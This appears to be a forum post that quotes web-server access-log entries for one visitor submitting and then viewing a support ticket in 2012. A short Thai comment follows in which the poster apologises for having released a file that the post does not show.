58.9.20.41 - - [25/Jan/2012:01:24:41 +0700] "GET /images/emails.gif HTTP/1.1" 200 1524 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3230 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2398 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /images/add.gif HTTP/1.1" 200 1092 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:53 +0700] "POST /submitticket.php HTTP/1.1" 200 734 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:55 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 766 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:55 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2318 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:57 +0700] "GET /viewticket.php?tid=300655&c=xHrbURKz HTTP/1.1" 200 4494 "https://mydomain.com/submitticket.php?step=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"


ผมไม่น่าเอาไฟล์มาปล่อยเลย เอาไฟล์มาแล้วเงียบ ก็คิดว่า มีเรื่องแน่ๆ ขอโทษด้วยครับ